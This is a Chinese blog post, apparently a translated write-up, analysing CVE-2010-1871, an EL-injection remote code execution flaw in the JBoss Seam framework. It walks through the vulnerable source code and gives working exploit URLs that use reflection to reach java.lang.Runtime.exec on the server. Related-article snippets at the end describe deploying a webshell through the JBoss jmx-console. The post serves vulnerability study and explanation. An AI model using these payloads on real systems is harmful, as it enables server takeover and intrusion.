JBOSS Seam框架远程代码执行漏洞

最新推荐文章于 2022-09-15 22:38:59 发布
最新推荐文章于 2022-09-15 22:38:59 发布
阅读量1.2k 收藏
点赞数 1
文章标签: jboss seam 框架 string redirect null

(转http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html)

本文相当于翻译了这篇文章,也主要是想为自己做个笔记

该漏洞的出现主要是由于Jboss-seamFramework框架开发者在加入EL组件支持时,由于没有处理好传给由EL处理的用户数据,导致这个漏洞的产生,structs的一个版本也出现过这样的问题。

EL的功能有:

1.方法调用:#{hotelBooking.bookHotel(hotel)}

2.返回属性:#{person.name}

3.投影迭代:#{company.departments.{d|d.name}}

实现该功能的子类有com.sun.faces.el.ImplicitObjectELResolverSeamELResolver.他们继承javax.el.ELResolver(你可以在j2ee手册里查看该类的介绍)。由于上面的特性,所以我们就可以通过调用系统的可执行命令的接口获得shell.该接口是java.lang.Runtimeexec

EL的调用格式是expressions.getClass().forName('java.lang.Runtime'),因此我们想远程实现执行相关命令就需要EL的调用expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6],"cmd")这样的格式

思路很简单,就是先获得Runtime实例,即通过java.lang.Runtime.getRuntime()方法获得,然后再调用exec(Stringcmd)方法运行命令

注意上面的getDeclaredMethods()[13]就表示获得Runtime实例,getDeclaredMethods()[6]调用exec方法。不过不同的操作系统还有jdk版本可能索引号不一样。我想大家从上面的EL调用格式就应该知道EL使用了反射(RejectAPI)哈,这就是问题的所在,一般在使用反射时,如果要加载的类本身就不安全,然而这个类的名称又可以由用户提供的话,那么就会出现这样的漏洞的。反射在实现程序的扩展方面确实有很大的作用,不过以后在我们做web应用时,如果非要用反射并提供暴露给用户的话,千万要注意这方面的过滤。

下面我们就来看一下Jboss-seamFramework在使用EL没注意到的问题,我会附上代码。红色为关键代码。

Jboss-seamFramework的例子程序samplebooking app,发现了该接口org.jboss.seam.navigation.Pages.callAction(),她是先获得用户提交的actionOutcome参数然后传递给JSFNavigationHandler抽象类的handleNavigation处理的,这里jboss是用SeamNavigationHandler继续该类并处理由用户传来的actionOutcome参数的。如果你不熟悉JSF请在网上找一下资料。相关代码如下

org.jboss.seam.navigation.Pages.callAction()

private static booleancallAction(FacesContext facesContext)

{

//TODO: refactor withPages.instance().callAction()!!

boolean result = false;

String outcome =facesContext.getExternalContext()

.getRequestParameterMap().get("actionOutcome");

String fromAction = outcome;

String decodedOutcome = null;

if (outcome != null)

{

decodedOutcome =URLDecoder.decode(outcome);

}

if (decodedOutcome != null &&(decodedOutcome.indexOf('#') >= 0 || decodedOutcome.indexOf('{')>= 0) ){

throw newIllegalArgumentException("EL expressions are not allowed inactionOutcome parameter");

}

if (outcome==null)

{

String actionId =facesContext.getExternalContext()

.getRequestParameterMap().get("actionMethod");

if (actionId!=null)

{

String decodedActionId =URLDecoder.decode(actionId);

if (decodedActionId != null &&(decodedActionId.indexOf('#') >= 0 || decodedActionId.indexOf('{')>= 0) ){

throw newIllegalArgumentException("EL expressions are not allowed inactionMethod parameter");

}

if (!SafeActions.instance().isActionSafe(actionId) ) return result;

String expression =SafeActions.toAction(actionId);

result = true;

MethodExpressionactionExpression =Expressions.instance().createMethodExpression(expression);

outcome = toString(actionExpression.invoke() );

fromAction = expression;

handleOutcome(facesContext,outcome, fromAction);

}

}

else

{

handleOutcome(facesContext,outcome, fromAction);

}

return result;

}

org.jboss.seam.navigation.Pages.handleOutcome()

public static voidhandleOutcome(FacesContext facesContext, String outcome, StringfromAction)

{

facesContext.getApplication().getNavigationHandler()

.handleNavigation(facesContext,fromAction, outcome);

//after every time that theview may have changed,

//we need to flush the pagecontext, since the

//attribute map is beingdiscarder

Contexts.getPageContext().flush();

}

org.jboss.seam.jsf.handleNavigation()

public voidhandleNavigation(FacesContext context, String fromAction, Stringoutcome)

{

if (!context.getResponseComplete() ) //workaround for a bug in MyFaces

{

if ( isOutcomeViewId(outcome))

{

FacesManager.instance().interpolateAndRedirect(outcome);

}

else if (Init.instance().isJbpmInstalled() &&Pageflow.instance().isInProcess() &&Pageflow.instance().hasTransition(outcome) )

{

Pageflow.instance().navigate(context,outcome);

}

else if (!Pages.instance().navigate(context, fromAction, outcome) )

{

baseNavigationHandler.handleNavigation(context, fromAction,outcome);

}

}

}

private static booleanisOutcomeViewId(String outcome) 50 {

return outcome!=null &&outcome.startsWith("/");

}

我们可以看到当在handleNavigation()方法里发现actionOutcome里包含如果是以/开头时就会把actionOutcome数据交给FacesManager.instance().interpolateAndRedirect()处理里,代码如下

public voidinterpolateAndRedirect(String url)

{

Map<String, Object>parameters = new HashMap<String, Object>();

int loc = url.indexOf('?');

if (loc>0)

{

StringTokenizer tokens = newStringTokenizer( url.substring(loc), "?=&" );

while ( tokens.hasMoreTokens())

{

String name =tokens.nextToken();

String value =Interpolator.instance().interpolate( tokens.nextToken() );

parameters.put(name, value);

}

url = url.substring(0, loc);

}

redirect(url, parameters, true,true);

}

在方法里我们可以发现一些满足条件的actionOutcome数据可以由Interpolator.instance().interpolate()处理,这就调用了EL的接口,因此就出现远程代码执行漏洞了。

利用的方式如下,你可以注意?=&要进行url编码

/seam-booking/home.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23{expressions.getClass().forName('java.lang.Runtime')}

按照程序的逻辑,当我们访问上面的网址里会redirect到另外一个地址/seam-booking/pwn.seam?pwned=class+java.lang.Runtime&cid=14

我们可以在网址中看到java.lang.Runtime,它实际上就是%23{expressions.getClass().forName('java.lang.Runtime')}运行后返回的字符串结果,即类的名称。

因此我们就可以通过这个过程获得我们想要实现执行命令的接口索引号,即java.lang.Runtime.getRuntime()java.lang.Runtime.exec()的索引号。通过访问/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6]}

我们得到/seam-booking/pwn.seam?pwned=public+static+java.lang.Runtime+java.lang.Runtime.getRuntime()&cid=24,这就是我们要的第一个接口.

然后依此猜,我们就得到/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13]}

得到的跳转页面是/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13]},这就是我们想要的第二个接口。,然后我们就可以构造能远程执行命令的数据交给EL处理了。

语句如下/seam-booking/home.seam?actionOutcome/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),'cmd')}.

通过上面我们应该了解到虽然jsp没有像asp,php等那样由于eval错误使用而导致远程代码执行漏洞来得干脆直接,不过不要忘记java的反射API的使用,因为反射可以加载主机的一些关键系统接口,导致直接可以得到shell.再加上一般jsp服务器权限大,一般都是root或者system,所以代码没写好,危害更大呀。

wenqin2006
关注
[ vulhub漏洞复现篇 ] JBOSS AS 4.x以下反序列化远程代码执行漏洞CVE-2017-7504
qq_51577576的博客
09-01 1081
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码
[ vulhub漏洞复现篇 ] JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149
qq_51577576的博客
08-31 1044
JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。...
浅谈“Jboss远程代码执行
→_→
07-23 1269
一:漏洞名称: Jboss远程代码执行, Jboss远程命令执行 描述: JBOSS默认配置会有一个后台漏洞漏洞发生在jboss.deployment命名空间,中的addURL()函数,该函数可以远程下载一个war压缩包并解压。 如果压缩包里含有webshell文件,是直接可以解析的。 检测条件: 被测网站采用了JBOSS中间件架构 检测方法: 对于采用JBOSS的网站,首先判断其版本,如果版本为1.0.x版本,则可通过对其控制台的访问来判断,访问http://127.0.
JBOSS远程代码执行漏洞
huike008的博客
07-20 218
JBOSS默认配置会有一个后台漏洞漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压。 访问http://www.abc.com.cn:8080/jmx-console/ 后台,如下图 下拉找到如下图所示 点击flavor=URL,type=DeploymentScanner进入 在输入框中写入war压缩文件webshe...
jboss seam 远程执行漏洞利用步骤
cnbird's blog
12-15 2787
目标:http://www.ip.com http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478 http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName ('j
JBOSS远程代码执行
swordheart的博客
03-29 814
0x00漏洞介绍 JBOSS默认配置会有一个后台漏洞漏洞发生在jboss.deployment命名空间,中的addURL()函数,该函数可以远程下载一个war压缩包并解压。如果压缩包里含有webshell文件,是直接可以解析的。 0x01 漏洞复现 http://192.200.30.43:8081/jmx-console/ 找到业务部署的入口,通过addurl,进行远程war包部署,访问地址:http://192.200.30.43:8081/jmx-console/HtmlAdaptor?
(五)vulhub专栏:Jboss远程代码执行漏洞复现
云舒的博客
07-13 623
Jboss远程代码执行 CVE-2017-12149 CVE-2017-7504
Jboss seam3 实战
03-29
标题中的“Jboss seam3 实战”表明,本文将重点介绍JBoss Seam框架的第三个版本的实际应用。JBoss Seam是一个开源的Java EE框架,它通过依赖注入和会话模型,简化了基于Java EE的企业级应用开发。Seam框架为开发者...
[ vulhub漏洞复现篇 ] Jboss_JMXInvokerServlet_Deserialization(反序列化)代码执行漏洞
qq_51577576的博客
09-15 1119
Jboss_JMXInvokerServlet_Deserialization代码执行漏洞漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
让-Flutter-在鸿蒙系统上跑起来,目录:鸿蒙系统适配;渲染流程打通;Flutter在鸿蒙系统上的移植
最新发布
09-29
鸿蒙----目录: 1、鸿蒙系统适配 2、渲染流程打通 3、Flutter在鸿蒙系统上的移植
【PFJSP问题】基于matlab灰狼算法GWO求解置换流水车间调度问题PFSP【含Matlab源码 7899期】.mp4
09-28
Matlab领域上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
基于TypeScript和Vue的日历展示与日程条创建设计源码
09-28
该项目为基于TypeScript和Vue构建的日历展示与日程条创建设计源码,包含33个文件,涉及10个TypeScript文件、5个JSON文件、4个LESS样式文件、3个Vue组件文件、2个JavaScript和SVG文件,以及HTML、Git忽略和Markdown文档等。该系统具备日历查看和日程条创建功能,适用于个人或团队日程管理需求。
基于Java语言实现的XXL-JOB分布式定时任务设计源码注释
09-28
该项目为XXL-JOB分布式定时任务系统设计源码,采用Java语言开发,辅以JavaScript和CSS进行界面设计。项目文件总计288个,其中Java源文件133个,PNG图片文件35个,JavaScript文件35个,XML配置文件16个,CSS样式文件12个,FTL模板文件11个,属性文件6个,Markdown文件3个,JPG图片文件3个,EOT字体文件3个。源码注释详尽,旨在提升代码可读性和维护性。
基于Vue框架的邻家优选电商平台设计源码
09-28
该项目是一款采用Vue框架开发的邻家优选电商平台设计源码,包含共计48个文件,涵盖17个Vue组件文件、10个JavaScript脚本文件、8个JPG图片文件、4个JSON配置文件、4个PNG图片文件,以及必要的配置文件和图标文件。该系统由Ipang组设计,旨在提供一站式购物体验。
基于JavaScript的Express框架开发的前端HTML+CSS设计源码
09-28
该项目是一款采用JavaScript及Express框架构建的前端HTML与CSS设计源码集合,共包含228个文件,其中JavaScript文件152个,EJS模板文件20个,Markdown文件13个,文本文件10个,HTML文件8个,模板文件7个,CSS文件4个,YAML文件3个,Handlebars模板文件3个,配置文件1个。该源码集合适用于快速开发前端界面,支持现代Web设计标准。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值